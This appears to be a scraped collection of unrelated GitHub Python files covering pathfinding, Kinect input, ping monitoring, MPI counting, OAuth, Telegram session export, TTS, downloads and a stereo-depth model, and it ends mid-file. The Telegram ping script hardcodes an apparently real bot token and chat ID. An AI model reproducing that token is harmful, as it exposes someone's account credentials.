mouse button was pressed\n elif pygame.mouse.get_pressed()[2]:\n pos = pygame.mouse.get_pos()\n row, col = cell.get_clicked_pos(pos, ROWS, width)\n\n # erase whatever is clicked\n spot = grid[row][col]\n spot.reset()\n\n # erase the start position\n if spot == 
start:\n start = None\n \n # erase the end position\n elif spot == end:\n end = None\n \n # if a key has been pressed\n if event.type == pygame.KEYDOWN:\n # if the spacebar was pressed and algorithm has not started yet\n if event.key == pygame.K_SPACE and start and end:\n # update all neighbours of all the spots\n for row in grid:\n for spot in row:\n spot.update_neighbors(grid)\n \n # apply the a* algorithm\n cell.algorithm(lambda: cell.draw(win, grid, ROWS, width), grid, start, end)\n \n # if c is pressed\n if event.key == pygame.K_c:\n # clear the grid and reset everything\n start = None\n end = None\n grid = cell.make_grid(ROWS, width)\n\n \n pygame.quit()\n\nmain(WIN, WIDTH)\n\n\n","repo_name":"yasbik/A_star-Pathfinder","sub_path":"src/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73221875786","text":"import cv2 as cv\nimport numpy as np\nfrom freenect import sync_get_video, sync_get_depth\nimport fluidsynth\n\n############### TODO ###############\n# Adicionar mais teclas\n# Cara, na boa, será que fluidsynth é o melhor MIDI player de python mesmo? Duvido um pouco mas tá bom\n# Cada tecla ter uma nota diferente\n# Definir automaticamente tamanho maneiro para cada tecla\n# Normalizar valor da margem (i.e. Vai que dá alguma interferenciazinhainha)\n\n#Função para pegar profundidade do Kinect\ndef get_depth():\n array,_ = sync_get_depth()\n array = array.astype(np.uint16)\n return array\n\n#Função para pegar vídeo do Kinect\ndef get_video():\n array,_ = sync_get_video()\n array = cv.cvtColor(array,cv.COLOR_RGB2BGR)\n return array\n\n# Desenha retângulo \ndef desenhar(event, x, y, flags, param):\n global ret0, ret1, keyboard, depth, holding, margem\n if event == cv.EVENT_LBUTTONDOWN:\n holding = True\n ret0 = [x, y]\n if event == cv.EVENT_LBUTTONUP:\n if holding:\n ret1 = [x, y]\n if ret0[0] > ret1[0]:\n ret0, ret1 = ret1, ret0\n keyboard = depth[ret0[1]:ret1[1], ret0[0]:ret1[0]]\n margem = np.sum(np.add(keyboard,keyboard * 0.015))\n holding = False\n\nclass Tecla():\n def __init__(self):\n global ret0, ret1\n self.area = np.zeros((0,0))\n self.cor = (255,0,128)\n self.ret = [ret0,ret1]\n \n # Verifica se a tecla foi apertada\n def apertou(self):\n global margem\n return np.sum(self.area) > margem\n \n # Toca a nota da tecla\n def tocar(self):\n pass\n\n # Mostra o retângulo da tecla no visualizador do OpenCV\n def render(self):\n global img\n cv.rectangle(img,(self.ret[0][0],self.ret[0][1]),(self.ret[1][0],self.ret[1][1]),self.cor,2)\n \n # Atualiza o campo de interesse\n def atualizaArea(self, depth):\n key.area = depth[self.ret[0][1]:self.ret[1][1], self.ret[0][0]:self.ret[1][0]]\n\nif __name__ == '__main__':\n\n fs = fluidsynth.Synth()\n fs.start(driver=\"pulseaudio\")\n sfid = fs.sfload(\"example.sf2\")\n fs.program_select(0, sfid, 0, 0)\n \n\n holding = False\n ret0 = ret1 = [0,0]\n margem = 0\n keyboard = np.zeros((1,1))\n key = Tecla()\n key2 = Tecla()\n cor = (255,0,128)\n cv.namedWindow('colmeia')\n cv.setMouseCallback('colmeia', desenhar)\n while True:\n img = get_video()\n depth = get_depth()\n if not holding:\n key.ret = [ret0,ret1]\n key.atualizaArea(depth)\n key.render()\n \n cv.imshow('colmeia', img)\n if key.apertou():\n fs.noteon(0, 60, 30)\n key.cor = (0,0,255)\n else:\n fs.noteoff(0,60)\n key.cor = (255,0,128)\n\n k = cv.waitKey(1)\n if k == 27:\n break\n fs.delete()\n 
cv.destroyAllWindows()","repo_name":"marcosoft47/opencv-tutorials","sub_path":"keyboardAnywhere/keyboardanywhere.py","file_name":"keyboardanywhere.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20454907437","text":"import requests\nimport os\nimport time\nimport subprocess\nfrom subprocess import Popen, DEVNULL\nimport socket\nimport sys\nimport datetime\nfrom datetime import datetime\nfrom subprocess import call\n\ndef telegram_bot_sendtext(bot_message):\n \n bot_token = '1322504589:AAEggDtxjh7jKvayd1uYm3d5Zy9WRDXbKd8'\n bot_chatID = '1372613452'\n send_text = 'https://api.telegram.org/bot' + bot_token + '/sendMessage?chat_id=' + bot_chatID + '&parse_mode=Markdown&text=' + bot_message\n\n response = requests.get(send_text)\n\n return response.json()\n\n\n### running bash command \"date\" and then print it out -- РАБОТИ !\n#p = subprocess.Popen([\"date\"], shell=True, stdout=subprocess.PIPE)\n#stdout = p.communicate()\n# print(str(stdout))\n\n######## start ##########\n# to try readning the \"hosts\" from a file (it will be better, because of a easier modification of hosts. Let's try\n######## end ############\n\n############\n### testing 19.08.2020, I want to add \"ping\" command to test it and to send the result through the telegram bot... let's do it !\nhost = \"10.19.8.1\" \nping = subprocess.Popen(\n [\"ping\", \"-c\", \"4\", host],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n)\n\nstdout, error = ping.communicate()\nprint(str(stdout))\n\ntest = telegram_bot_sendtext(str(stdout))\n\n\n###\nhost = \"10.19.8.5\" \nping = subprocess.Popen(\n [\"ping\", \"-c\", \"4\", host],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n)\n\nstdout, error = ping.communicate()\nprint(str(stdout))\n\ntest = telegram_bot_sendtext(str(stdout))\n\n\n###\nhost = \"127.0.0.1\" \nping = subprocess.Popen(\n [\"ping\", \"-c\", \"4\", host],\n stdout = subprocess.PIPE,\n stderr = subprocess.PIPE\n)\n\nstdout, error = ping.communicate()\nprint(str(stdout))\n\n\n### redirect the command output to a file, using \"sys.stdout\" \nsys.stdout = open('ping-results.txt', 'a+')\nn = datetime.now()\nwith open(\"ping-results.txt\", \"a+\") as myfile:\n myfile.write(\"-------\\n\")\n myfile.write(\"%s\"%n)\n myfile.write(\"\\n\")\n myfile.write(\"-------\\n\")\nprint(str(stdout))\n\n### It works!\n#############\n\n### send message to the Telegram Bot, the output of \"date\" will be send, It needs to be \"str\", It cannot send \"tuple\"\ntest = telegram_bot_sendtext(str(stdout))\n\n# send a mail\nwith open('/home/mitaka/mail-script.sh', 'rb') as file:\n script = file.read()\nrc = call('/home/mitaka/mail-script.sh', shell=True)\n\n\n### If I want to send just a message\n#test = telegram_bot_sendtext('test,test,test,... my result is. test,test,test... 
my result is...')\n","repo_name":"pisarov/network-sciprts","sub_path":"telegram_message.py","file_name":"telegram_message.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22090209638","text":"from mpi4py import MPI \r\nimport json\r\nimport numpy as np\r\nimport re\r\n\r\ncomm = MPI.COMM_WORLD\r\nsize = comm.Get_size()\r\nrank = comm.Get_rank()\r\n\r\n# Here, we define some variables for all processors.\r\n# These counters are used to count post number for each processor.\r\ncount_post_per_box = {}\r\ncount_post_per_row = {}\r\ncount_post_per_column = {}\r\n\r\n#These variables are used by master node to sum up the post numbers.\r\nsum_post_for_box_per_pro = None\r\nsum_post_for_row_per_pro = None\r\nsum_post_for_column_per_pro = None\r\n\r\n#############------------------------------------------------Function Definition---------------------------------------------######################\r\n# I first define some functions which will be used next.\r\n# Get rid of all useless attributes in json object. Only the information of coordinates will be recorded\r\ndef get_filtered_data(json_obj):\r\n json_data = None\r\n \r\n if \"doc\" in json_obj:\r\n if \"coordinates\" in json_obj[\"doc\"]:\r\n if \"coordinates\" in json_obj[\"doc\"][\"coordinates\"]:\r\n json_data = {\"coordinates\": json_obj[\"doc\"][\"coordinates\"][\"coordinates\"]}\r\n\r\n return json_data\r\n\r\n# Check whether it is inside the whole range of interest\r\ndef check_whether_in_range(x_value, y_value, range_of_data):\r\n A1_xmin = range_of_data[0][0]\r\n A1_ymax = range_of_data[0][1]\r\n C4_xmax = range_of_data[1][0]\r\n C4_ymin = range_of_data[1][1]\r\n C3_xmin = range_of_data[2][0]\r\n C3_ymax = range_of_data[2][1]\r\n D5_xmax = range_of_data[3][0]\r\n D5_ymin = range_of_data[3][1]\r\n \r\n if x_value >= A1_xmin and x_value <= C4_xmax and y_value <= A1_ymax and y_value >= C4_ymin:\r\n return True\r\n elif x_value >= C3_xmin and x_value <= D5_xmax and y_value <= C3_ymax and y_value >= D5_ymin:\r\n return True\r\n else:\r\n return False\r\n\r\n# Check which box the coordinate pair belongs to\r\ndef get_box_id_for_json_object(x_value, y_value, range_of_each_box):\r\n\r\n #If the coordinates fall on the overlapped edge, it belongs to the biggest box_id of them. For example, if the point falls on the common edge of A1 and A2,\r\n #it belongs to A2. 
If the point falls on the center point of A1, A2, B1, B2, it belongs to B2.\r\n #Record all possible box_ids\r\n ids = []\r\n for box in range_of_each_box:\r\n if (x_value >= box[\"xmin\"] and x_value <= box[\"xmax\"] and y_value >= box[\"ymin\"] and y_value <= box[\"ymax\"]):\r\n ids.append(box[\"id\"])\r\n # Coordiantes on the overlapped edge belong to the last box_id\r\n # If it does not belong to any box, it will return None.\r\n try:\r\n return ids[-1]\r\n except IndexError:\r\n return None\r\n\r\n\r\n#############------------------------------------------------Master node's work---------------------------------------------######################\r\n# Master node reads 'melbgrid' file and broadcasts some range parameters so slavers don't have to open this file again\r\nif rank == 0:\r\n grid_filename = \"melbGrid.json\"\r\n \r\n # range_of_each box is used to record xmin, xmax, ymin, ymax of each box\r\n range_of_each_box = []\r\n\r\n with open(grid_filename, \"r\", encoding=\"utf-8\") as grid_file:\r\n whole_obj = json.load(grid_file)\r\n box_objs = whole_obj[\"features\"]\r\n\r\n for box_obj in box_objs:\r\n\r\n # Record each box's vertexes.\r\n range_of_box = {\"id\": box_obj[\"properties\"][\"id\"],\r\n \"xmin\": box_obj[\"properties\"][\"xmin\"],\r\n \"xmax\": box_obj[\"properties\"][\"xmax\"],\r\n \"ymin\": box_obj[\"properties\"][\"ymin\"],\r\n \"ymax\": box_obj[\"properties\"][\"ymax\"],\r\n }\r\n range_of_each_box.append(range_of_box)\r\n\r\n # Fetch the vertex coordinates of A1, C4, C3, D5 since the union of rectangle(A1, C4) and rectangle(C4, D5) defines the whole range of interest\r\n # These coordinates will be broadcast to all other processors\r\n if box_obj[\"properties\"][\"id\"] == \"A1\":\r\n A1_xmin = box_obj[\"properties\"][\"xmin\"]\r\n A1_ymax = box_obj[\"properties\"][\"ymax\"]\r\n elif box_obj[\"properties\"][\"id\"] == \"C4\":\r\n C4_xmax = box_obj[\"properties\"][\"xmax\"]\r\n C4_ymin = box_obj[\"properties\"][\"ymin\"]\r\n elif box_obj[\"properties\"][\"id\"] == \"C3\":\r\n C3_xmin = box_obj[\"properties\"][\"xmin\"]\r\n C3_ymax = box_obj[\"properties\"][\"ymax\"]\r\n elif box_obj[\"properties\"][\"id\"] == \"D5\":\r\n D5_xmax = box_obj[\"properties\"][\"xmax\"]\r\n D5_ymin = box_obj[\"properties\"][\"ymin\"]\r\n\r\n # Initialize the counter dictionaries for each processor to record the post number:\r\n # For example, post numbers will be recorded like {\"A1\":0, \"A2\":0, \"B1\":0....} in each processor\r\n if box_obj[\"properties\"][\"id\"] not in count_post_per_box:\r\n count_post_per_box[box_obj[\"properties\"][\"id\"]] = 0\r\n\r\n if box_obj[\"properties\"][\"id\"][0] not in count_post_per_row:\r\n count_post_per_row[box_obj[\"properties\"][\"id\"][0]] = 0\r\n\r\n if box_obj[\"properties\"][\"id\"][1] not in count_post_per_column:\r\n count_post_per_column[box_obj[\"properties\"][\"id\"][1]] = 0\r\n\r\n # Range_of_data is to define the peripheral border of the whole range.\r\n range_of_data = [(A1_xmin,A1_ymax),(C4_xmax,C4_ymin),(C3_xmin,C3_ymax),(D5_xmax,D5_ymin)]\r\n\r\n\r\nelse:\r\n range_of_data = None\r\n range_of_each_box = None\r\n count_post_per_box = None\r\n count_post_per_row = None\r\n count_post_per_column = None\r\n\r\n# Broadcast whole range of interest as well as range for each box \r\nrange_of_data = comm.bcast(range_of_data)\r\nrange_of_each_box = comm.bcast(range_of_each_box)\r\n\r\n# Broadcast dictionaries for processors to fill in. 
Dictionaries are initialized like this {\"A1\":0, \"A2\":0, \"B1\":0....}.\r\ncount_post_per_box = comm.bcast(count_post_per_box)\r\ncount_post_per_row = comm.bcast(count_post_per_row)\r\ncount_post_per_column = comm.bcast(count_post_per_column)\r\n\r\n\r\n#############------------------------------------------------Parallel Computing Starts Here---------------------------------------------######################\r\ndata_origin_filename = \"bigInstagram.json\"\r\n\r\n# Counter is used to record current line sequence number\r\ncounter = -1\r\n# First, collect all the data within the range and check which boxes they belong to\r\ndata_of_interest = []\r\n# Open the data file\r\nwith open(data_origin_filename, \"r\", encoding=\"utf-8\") as data_origin_file:\r\n # Read and process the file line by line except for the first line and last line\r\n for line in data_origin_file:\r\n counter += 1\r\n # Check if it is the first line, if so, skip it.\r\n if counter == 0:\r\n continue\r\n # Also check if it is the last line, if so, skip it. For tinyInstagram and mediumInstagram file, the last line starts with ']}'\r\n if re.match(r'^]}.*', line):\r\n break\r\n \r\n # Rank 0 processes line 0, rank 1 processes line 1, rank 2 processes line 2....\r\n if counter % size == rank:\r\n json_obj = {}\r\n\r\n #Last line of data ends with '}]}' in bigInstagram file\r\n if re.match(r'.*}]}$', line):\r\n json_obj = json.loads(line.strip()[:-2])\r\n \r\n #Last line of data ends with '}' in tinyInstagram & mediumInstagram file\r\n elif re.match(r'.*}$', line):\r\n json_obj = json.loads(line.strip())\r\n\r\n else:\r\n # For other lines, get rid of the ',' at the end of the line\r\n json_obj = json.loads(line.strip()[:-1])\r\n\r\n #Check if this json object has 'coordinates' key\r\n json_data = get_filtered_data(json_obj)\r\n if json_data != None:\r\n x = json_data[\"coordinates\"][1]\r\n y = json_data[\"coordinates\"][0]\r\n \r\n # Check if this json object inside the range of interest\r\n if x != None and y != None and check_whether_in_range(x,y,range_of_data):\r\n # Record the box_id for json object using dictionary\r\n box_id = get_box_id_for_json_object(x,y,range_of_each_box)\r\n if box_id != None:\r\n dict_new = {\"x_value\":x, \"y_value\":y, \"box_id\": box_id}\r\n data_of_interest.append(dict_new)\r\n\r\n# Second, each processor calculates post number for each box, row, column using the key \"box_id\"\r\nfor obj_of_interest in data_of_interest:\r\n count_post_per_box[obj_of_interest[\"box_id\"]] += 1\r\n count_post_per_row[obj_of_interest[\"box_id\"][0]] += 1\r\n count_post_per_column[obj_of_interest[\"box_id\"][1]] += 1\r\n\r\n\r\n# Gather the results from all processors to master node\r\nsum_post_for_box_per_pro = comm.gather(count_post_per_box,root = 0)\r\nsum_post_for_row_per_pro = comm.gather(count_post_per_row,root = 0)\r\nsum_post_for_column_per_pro = comm.gather(count_post_per_column, root = 0)\r\n\r\nif rank == 0:\r\n \r\n # Handle the lists collected from all processors. 
Master node sums them up for each row, column and box.\r\n sum_post_for_box={}\r\n sum_post_for_row={}\r\n sum_post_for_column={}\r\n \r\n for each_item in sum_post_for_box_per_pro:\r\n for each_box in each_item:\r\n if each_box not in sum_post_for_box:\r\n sum_post_for_box[each_box] = 0\r\n sum_post_for_box[each_box] += each_item[each_box]\r\n\r\n for key in sum_post_for_box:\r\n if key[0] not in sum_post_for_row:\r\n sum_post_for_row[key[0]] = 0\r\n sum_post_for_row[key[0]] += sum_post_for_box[key]\r\n\r\n for key in sum_post_for_box:\r\n if key[1] not in sum_post_for_column:\r\n sum_post_for_column[key[1]] = 0\r\n sum_post_for_column[key[1]] += sum_post_for_box[key]\r\n\r\n\r\n # Sort the results and generate output\r\n print(\"Order the grid box based on the number of posts in each box\")\r\n for post_pair in sorted(sum_post_for_box.items(), key = lambda x:x[1], reverse = True):\r\n print(post_pair[0] + \" : \" + str(post_pair[1]))\r\n\r\n print(\"\\nOrder the grid rows based on the number of posts in each row\")\r\n for post_pair in sorted(sum_post_for_row.items(), key = lambda x:x[1], reverse = True):\r\n print(post_pair[0] + \" : \" + str(post_pair[1]))\r\n\r\n print(\"\\nOrder the grid columns based on the number of posts in each column\")\r\n for post_pair in sorted(sum_post_for_column.items(), key = lambda x:x[1], reverse = True):\r\n print(post_pair[0] + \" : \" + str(post_pair[1]))\r\n\r\n","repo_name":"Serena-Chenzz/MPI_Programming","sub_path":"test_big.py","file_name":"test_big.py","file_ext":"py","file_size_in_byte":10652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23438058177","text":"from pyrogram import Client\nimport tgcrypto\n\nprint(\"\\n\\n • Program String Generator •\")\nprint(\"\\n\\n Enter Your Vail Details to Continue\")\n\n\nAPI_KEY = int(input(\"\\n\\nEnter API ID: \"))\nAPI_HASH = input(\"Enter API HASH: \")\nwith Client(':memory:', api_id=API_KEY, api_hash=API_HASH) as app:\n print(app.export_session_string())\n print(\"Your Pyrogram String Session Generated Successfully, Check Your Save Message -!\")\n session = app.export_session_string()\n a = app.send_message(\"me\", \"`{}`\".format(app.export_session_string()))\n app.send_message(\n chat_id=a.chat.id,\n text=\"**Here Is Your Pyrogram String Session, Don't Share Any Where -! \\n\\n © @kaalxsupport**\",\n reply_to_message_id=a.message_id)\n","repo_name":"kaal0408/Meow","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"23864479661","text":"from social.backends.oauth import BaseOAuth2\nfrom urllib import urlencode\nimport json\nimport sys\n\nfrom models import User, Hacker\n\nHACKER_ATTRIBUTES = ('avatar_url', 'twitter', 'github')\nUSER_FIELDS = ['username', 'email']\n\ndef find_legacy_user(strategy, uid, details, user=None, social=None, *args, **kwargs):\n # user is present if we're currently logged in (very unlikely given there's no\n # link to /login/hackerschool when you are logged in).\n #\n # social is present if we've already oauthed with hackerschool.com before.\n # If this is the case, we don't need to find the legacy user.\n # Social.pipeline.social_auth.social_user sets user from social.\n if user or social:\n return None\n\n # first try finding a legacy account by matching the email returned from\n # the API. 
This won't always work because people can change their emails on\n # hackerschool.com.\n users = User.objects.filter(email=details['email'])\n\n if users:\n return {'user': users[0]}\n\n # Fall back on matching by username. People can't change thier names on\n # hackerschool.com. We tried email first because email addresses are\n # globally unique, while it's possible that two people might have the same\n # name and thus username.\n users = User.objects.filter(username=details['username'])\n\n if users:\n return {'user': users[0]}\n\n # If we get down here, we're almost certainly dealing with a new uesr.\n # Social.pipeline.user.create_user will make a new user shortly after this.\n return None\n \ndef create_user(strategy, details, response, uid, user=None, *args, **kwargs):\n if user:\n return\n\n fields = dict((name, kwargs.get(name) or details.get(name)) \n for name in strategy.setting('USER_FIELDS',\n USER_FIELDS))\n # The new user ID should be the same as their ID on hackerschool.com\n fields['id'] = details.get(\"id\")\n \n if not fields:\n return\n\n return {\n 'is_new': True,\n 'user': strategy.create_user(**fields)\n }\n\ndef create_or_update_hacker(strategy, details, response, user, *args, **kwargs):\n if hasattr(user, 'hacker'):\n # If there's a hacker already, this is an existing user, and we'll\n # update the hacker.\n hacker = user.hacker\n else:\n # If there's no hacker, that means this is a new user. Let's make the\n # hacker.\n hacker = Hacker(user=user)\n\n changed = False\n\n for name, value in details.items():\n if name in HACKER_ATTRIBUTES:\n setattr(hacker, name, value)\n changed = True\n\n if changed:\n hacker.save()\n\nclass HackerSchoolOAuth2(BaseOAuth2):\n \"\"\"HackerSchool.com OAuth2 authentication backend\"\"\"\n name = 'hackerschool'\n HACKER_SCHOOL_ROOT = 'https://www.hackerschool.com'\n AUTHORIZATION_URL = HACKER_SCHOOL_ROOT + '/oauth/authorize'\n ACCESS_TOKEN_URL = HACKER_SCHOOL_ROOT + '/oauth/token'\n ACCESS_TOKEN_METHOD = 'POST'\n REFRESH_TOKEN_URL = ACCESS_TOKEN_URL\n SCOPE_SEPARATOR = ','\n EXTRA_DATA = [\n ('id', 'id'),\n ('expires', 'expires')\n ]\n\n def get_user_details(self, response):\n \"\"\"Return user details.\"\"\"\n first_name = response.get('first_name') or ''\n last_name = response.get('last_name') or ''\n username = first_name + last_name\n return {\n 'id': response.get('id'),\n 'email': response.get('email'),\n 'first_name': first_name,\n 'last_name': last_name,\n 'username': username,\n 'avatar_url': response.get('image'),\n 'twitter': response.get('twitter') or '',\n 'github': response.get('github') or '',\n }\n\n def get_user_id(self, details, response):\n \"\"\"Return a unique ID for the current user, by default from server\n response.\"\"\"\n return response.get('id')\n\n def user_data(self, access_token, *args, **kwargs):\n \"\"\"Loads user data.\"\"\"\n url = self.HACKER_SCHOOL_ROOT + '/api/v1/people/me?' 
+ urlencode({\n 'access_token': access_token\n })\n try:\n request = self.request(url, method='GET')\n return request.json()\n except ValueError:\n return None\n","repo_name":"murphsp1/blaggregator","sub_path":"home/oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":4392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32624446009","text":"import pyttsx3\n\n\nclass TTS:\n\n @staticmethod\n def play_system_voice_examples():\n tts = pyttsx3.init()\n tts.setProperty('rate', 150)\n\n voices = tts.getProperty('voices')\n print('Your system has {} voices installed. Playing examples ...'.format(len(voices)))\n\n for i in range(len(voices)):\n tts.setProperty('voice', voices[i].id)\n tts.say('This is an English example of your system\\'s voice with the id {}'.format(i))\n tts.runAndWait()\n tts.say('Das ist ein deutsches Beispiel der Systemstimme mit der ID {}'.format(i))\n tts.runAndWait()\n\n print('Finished playing examples. Enter the desired voice\\'s id in your configuration file.')\n\n def __init__(self, voice_id: int, words_per_minute: int):\n self.tts = pyttsx3.init()\n self.tts.setProperty('voice', self.tts.getProperty('voices')[voice_id].id)\n self.tts.setProperty('rate', words_per_minute)\n\n def say(self, text: str):\n self.tts.say(text)\n self.tts.runAndWait()\n","repo_name":"codeneobee/concourse-blame","sub_path":"concourse_blame/tts.py","file_name":"tts.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17331244469","text":"import concurrent.futures\n\nfrom itertools import repeat\n\nfrom rich.progress import Progress\n\nimport requests\n\nfrom pypackage.util.progress_manager import ProgressManager\n\nclass PooledDownloader:\n def __init__(self, progressManager: ProgressManager, workers: int = 4, chunksize: int = 512):\n self.progressManager = progressManager\n self.chunksize = chunksize\n self.pool = concurrent.futures.ThreadPoolExecutor(max_workers = workers)\n\n def _downloadUrlToPath(self, label: str, url: str, path: str) -> str: \n request = requests.get(url, stream = True)\n if \"Content-Length\" in request.headers:\n total = int(request.headers[\"Content-Length\"])\n else:\n total = 0\n task = self.progressManager.addTask(label, total) if total > 2**20 else None\n with open(path, \"wb\") as file:\n for chunk in request.iter_content(self.chunksize):\n file.write(chunk)\n if task:\n self.progressManager.updateTask(task, self.chunksize)\n if task:\n self.progressManager.finishTask(task)\n return path\n\n def downloadUrlToPath(self, url: str, path: str, label: str) -> concurrent.futures.Future:\n return self.pool.submit(self._downloadUrlToPath, label, url, path)\n\n def __enter__(self):\n self.progressManager.start()\n return self\n def __exit__(self, excType, excVal, excTb):\n self.progressManager.finish()\n self.pool.shutdown(wait = True, cancel_futures = True)","repo_name":"GingerIndustries/pypackage","sub_path":"pypackage/util/pooled_downloader.py","file_name":"pooled_downloader.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"17547006593","text":"from __future__ import annotations\nfrom typing import List, Dict, Set, Any, Iterable\n\nimport os\nimport pickle\nimport json\nfrom contextlib import contextmanager\n\n\ndef create_dir_if_not_exists(path: str) -> None:\n if not 
os.path.exists(path):\n os.makedirs(path, exist_ok=True) \n\n\ndef open_line_by_line_txt_file(\n file_dir: str, \n mode: str = \"r\", \n as_set: bool = False \n) -> List | Set:\n \"\"\"\n \"\"\"\n if file_dir.endswith('.txt'):\n with open(file_dir, mode) as f:\n txt = [line.strip(\"\\n\") for line in f]\n if as_set:\n return set(txt)\n return txt\n\n\ndef open_json_as_dict(file_dir: str) -> Dict[str, Any]:\n \"\"\"\n \"\"\"\n if file_dir.endswith('.json'):\n with open(file_dir) as f:\n return json.load(f)\n\n\ndef persist_iterable_as_txtfile(data: Iterable, file_dir: str) -> None:\n \"\"\"\n \"\"\"\n with open(file_dir, 'w') as file:\n for item in data:\n file.write(str(item) + '\\n')\n\ndef persist_dict_as_json(\n file: Dict[str, Any], \n mode: str,\n file_dir: str,\n) -> None:\n \"\"\"\n \"\"\"\n with open(file_dir, mode) as f:\n json.dump(file, f, indent=4)\n \n\ndef persist_data_with_pickle(\n file_to_persist: Any, \n mode: str,\n file_dir: str\n) -> None:\n \"\"\"\n \"\"\"\n with open(file_dir, mode) as f:\n pickle.dump(file_to_persist, f)\n \n\ndef load_data_with_pickle(\n mode: str,\n file_dir: str\n) -> None:\n \"\"\"\n \"\"\"\n return pickle.load(open(file_dir, mode))\n\n\ndef check_if_dir_extension_is(to_check: str, dir_path: str) -> bool:\n if dir_path is None:\n return\n extension = os.path.splitext(dir_path)[1].lower()\n if extension in to_check:\n return True\n else:\n return False\n \ndef lazy_writer(file_path: str, sep: str =\"\\n\") -> None:\n \"\"\"\n A function that lazily writes strings to a text file.\n\n It uses the internal function '_lazy_write' to handle file opening and \n closing. It also uses a yield construct to allow data to bewritten to\n the file lazily.\n\n The function is initialized using the following code:\n\n writer = lazy_writer(file_path)\n next(writer)\n\n and allows strings to be added using a call to sent():\n\n writer.send(str_obj)\n\n Args:\n file_path: The path where the text strings will be stored.\n sep: Text separator.\n \"\"\"\n @contextmanager\n def _lazy_write(file_path=file_path):\n try:\n with open(file_path, \"w\") as f:\n try:\n yield f\n finally:\n f.flush()\n except FileNotFoundError as e:\n raise e\n \n with _lazy_write(file_path) as f:\n while True:\n text = yield\n f.write(text + sep)\n\n","repo_name":"julchia/pypipe-preprocessing-tool","sub_path":"pypipe/core/processes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4242242561","text":"from __future__ import print_function, division\nimport os\nimport argparse\nimport torch.nn as nn\nfrom skimage import io\nimport matplotlib.pyplot as plt\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom datasets import __datasets__\nfrom models import __models__\nfrom utils import *\nfrom utils.KittiColormap import *\nfrom datasets.data_prepare import dataprepare\nimport time\n\n\ncudnn.benchmark = True\n\nparser = argparse.ArgumentParser(description='ASNet')\nparser.add_argument('--model', default='ASNet', help='select a model structure', choices=__models__.keys())\nparser.add_argument('--maxdepth', type=int, default=10, help='maximum depth')\nparser.add_argument('--dataset', help='dataset name', choices=__datasets__.keys())\nparser.add_argument('--datasplit', help='data spilt',type=int, default=1)\nparser.add_argument('--datafilename', help='data file name',type=str, 
default='event7.aedat4')\nparser.add_argument('--datapath', required=True, help='data path')\nparser.add_argument('--testlist', required=True, help='testing list')\nparser.add_argument('--loadckpt', required=True, help='load the weights from a specific checkpoint')\n\n\n# parse arguments\nargs = parser.parse_args()\n\n# dataset, dataloader\nStereoDataset = __datasets__[args.dataset]\n\n\nif(args.dataset == 'mvsec'):\n if not os.path.exists('./datasets/prepare.txt'):\n dataprepare(args.dataset,args.datapath)\n test_dataset = StereoDataset(args.datasplit,args.datapath, args.testlist, False)\n \nelse:\n if not os.path.exists('./datasets/prepare4.txt'):\n dataprepare(args.dataset,args.datapath+'/'+args.datafilename)\n test_dataset = StereoDataset(args.datafilename,args.datapath, args.testlist, False)\n\n \nTestImgLoader = DataLoader(test_dataset, 1, shuffle=False, num_workers=4, drop_last=True)\n\n\n\n# model, optimizer\nmodel = __models__[args.model](args.maxdepth)\nmodel = nn.DataParallel(model)\nmodel.cuda()\n\n# load parameters\nprint(\"Loading model {}\".format(args.loadckpt))\nstate_dict = torch.load(args.loadckpt)\nmodel.load_state_dict(state_dict['model'])\n\n\ndef test(args):\n print(\"Generating the disparity maps...\")\n\n os.makedirs('./predictions', exist_ok=True)\n \n start=time.time()\n\n for batch_idx, sample in enumerate(TestImgLoader):\n \n\n disp_est_tn = test_sample(sample)\n disp_est_np = tensor2numpy(disp_est_tn)\n disp_est_np = np.array([disp_est_np])\n top_pad_np = tensor2numpy(sample[\"top_pad\"])\n right_pad_np = tensor2numpy(sample[\"right_pad\"])\n left_filenames = sample[\"left_filename\"]\n\n \n\n \n\n for disp_est, top_pad, right_pad, fn in zip(disp_est_np, top_pad_np, right_pad_np, left_filenames):\n\n \n disp_est = disp_est[0]\n assert len(disp_est.shape) == 2\n\n disp_est = np.array(disp_est[top_pad:, :-right_pad], dtype=np.float32)\n name = fn.split('/')\n fnplt = os.path.join(\"predictions\", 'plt_'+name[-1])\n fnplt = fnplt.replace('pfm','jpg')\n\n fn = os.path.join(\"predictions\", name[-1])\n\n \n\n\n\n\n print(fn)\n cv2.imwrite(fn, disp_est)\n plt.imsave(fnplt, disp_est)\n\n \n \n end =time.time()\n \n\n print(\"Done!\")\n print(\"time:\",end-start)\n\ndef save_txt(path,data):\n\twith open(path, 'w') as outfile:\n\t\tfor slice_2d in data:\n\t\t\tnp.savetxt(outfile, slice_2d, fmt = '%f', delimiter = ',')\n\n\n@make_nograd_func\ndef test_sample(sample):\n model.eval()\n disp_ests = model(sample['left'].cuda(), sample['right'].cuda())\n return disp_ests[-1]\n\nDISPARITY_MULTIPLIER = 7.0\nFOCAL_LENGTH_X_BASELINE = {\n 'indoor_flying': 19.941772,\n}\n\ndef depth_to_disparity(depth_maps):\n \"\"\"\n Conversion from 